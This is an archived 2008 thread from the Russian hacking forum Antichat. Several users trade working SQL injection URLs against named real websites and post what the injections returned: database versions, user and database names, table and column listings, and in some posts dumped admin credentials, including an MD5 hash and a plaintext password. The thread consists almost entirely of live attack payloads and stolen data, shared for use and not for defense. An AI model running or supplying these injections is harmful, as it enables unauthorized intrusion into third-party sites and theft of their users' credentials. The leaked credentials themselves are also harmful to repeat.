ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.01.2008, 14:29
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040
Репутация:
177
|
|
а подумать?
http://www.pilot-film.com/index.php?id=222222222+union+select+1,AES_DECRYPT( AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9,10,11/*
|
|
|
12.01.2008, 15:00
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
http://www.haifa.ru/article.php?id=-743+union+select+1,concat_ws(0x2f,version(),user() ,database()),3,4,5,6,7,8,9/*&Lang=Ru
5.0.45/haifaru@81.177.16.101/haifaru_artcls
-----------------------------------------------------------------------
http://www.muscul.ru/article.php?id=-5+union+select+1,2,concat_ws(0x2f,version(),user() ,database()),4,5,6,7,8,9/*
4.1.22-log/musculr4_first@localhost/musculr4_main
-----------------------------------------------------------------------
http://www.rustrana.ru/article.php?nid=-3435+union+select+concat_ws(0x2f,version(),user(), database()),2,3/*
Вывод в тайтле))
-----------------------------------------------------------------------
http://www.chayka.com/article.php?id=-53+union+select+1,concat_ws(0x2f,version(),user(), database()),3,4,5,6,7,8,9,10,11/*
5.0.45/seagullmag@localhost/seagullmag
Все таблицы:
http://www.chayka.com/article.php?id=-53+union+select+1,table_name,3,4,5,6,7,8,9,10,11+f rom+information_schema.tables/*
Все колонки:
http://www.chayka.com/article.php?id=-53+union+select+1,column_name,3,4,5,6,7,8,9,10,11+ from+information_schema.columns/*
-----------------------------------------------------------------------
http://www.phpbuddy.com/article.php?id=-8+union+select+concat_ws(0x2f,version(),user(),dat abase()),2,3,4,5,6/*
4.1.21-standard/phpbud22_phpbudd@localhost/phpbud22_phpbuddy
-----------------------------------------------------------------------
http://www.michaelpollan.com/article.php?id=-80+union+select+1,concat_ws(0x2f,version(),user(), database()),3,4,5,6,7,8,9,10/*
4.1.22-standard/pollan_article@localhost/pollan_articles
-----------------------------------------------------------------------
http://www.mcpost.com/article.php?id=-418+union+select+1,2,3,concat_ws(0x2f,version(),us er(),database()),5,6,7,8,9,10,11,12/*
4.0.27-log/mcpost@localhost/mcpost
http://www.mcpost.com/article.php?id=-418+union+select+1,2,concat(username,char(58),pass word),4,5,6,7,8,9,10,11,12+from+users/*
Можно через limit
|
|
|
|
12.01.2008, 15:23
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329
Репутация:
-2
|
|
http://www.uprava.org/section.php?id=235+union+select+0,1,2,3,4,5,column _name+from+uprava_org.razdels/*
узнал только,что есть колонка id.Других помоему нет,перебрал все названия,что встретились в форме)).К другим таблицам я доступа не нашёл.
|
|
|
|
12.01.2008, 15:30
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329
Репутация:
-2
|
|
Сообщение от Welemir
http://www.uprava.org/section.php?id=235+union+select+0,1,2,3,4,5,column _name+from+uprava_org.razdels/*
узнал только,что есть колонка id.Других помоему нет,перебрал все названия,что встретились в форме)).К другим таблицам я доступа не нашёл.
К таблица information_schema и id нетьу доступа)(
|
|
|
|
12.01.2008, 15:37
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329
Репутация:
-2
|
|
http://www.ipecac.com/bio.php?id=44+union+select+0,1,2,3/*
Доступа нету ваапще:РР,зато запрос order+by пашет.
|
|
|
|
12.01.2008, 15:44
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344
Репутация:
48
|
|
я занова перебрал... больше этого нечего недобился
Код HTML:
http://www.uprava.org/section.php?id=-1+union+select+1,2,concat(Version(),0x3a,USER(),0x3a,DATABASE()),4,5,6,7/*
|
|
|
|
12.01.2008, 15:48
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329
Репутация:
-2
|
|
Сообщение от WuWu
я занова перебрал... больше этого нечего недобился
Код HTML:
http://www.uprava.org/section.php?id=-1+union+select+1,2,concat(Version(),0x3a,USER(),0x3a,DATABASE()),4,5,6,7/*
Тож самое,ток я по другому сделал:Р.Перебирал полчаса и нифига)
|
|
|
|
12.01.2008, 17:48
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
newyorkrecruiter.com
Код HTML:
http://www.newyorkrecruiter.com/job_browse.php?category_alpha=-1+union+select+USER(),VERSION(),DATABASE(),4/*
USER:recnet2@localhost
VERSION:4.1.20-log
DATABASE  ortlandrecruiter_com_-_site
Код HTML:
http://www.newyorkrecruiter.com/job_browse.php?category_alpha=-1+union+select+username,password,3,4+from+users+limit+1,100/*
Есть поля - username,password
и таблица - users 
|
|
|
|
12.01.2008, 18:08
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://omsk.arsec.ru/modules/nnews/index.php?idnews=-35+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,login name,pass)+from+xs_users/*&act=detail
5.0.45-log
Admin:3e22c75c164803a3989a7d36c5efbff0
пароль не поддаёться
----------------------------------------------------------------------
http://www.ams-prototype.com/ams/?id=-33+union+select+1,2,3,4,5,concat(username,0x3a,pas sword),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3+from+uten ti+limit+0,1/*
5.0.45-
admin:amsrlpw01
де админка не знаю ((
|
|
|
|
12.01.2008, 19:50
|
|
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
Провел на форуме:
1172175
Репутация:
252
|
|
Код:
http://www.gimmeshelter.co.uk/ArtistInfo.php?user_id=99999+union+select+1,2,concat_ws(0x3a,username,password,email),4,5,6+from+user+limit+2,1/*
corrugated@dinero.dreamhost.com
corrugated
5.0.24a-standard-log |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
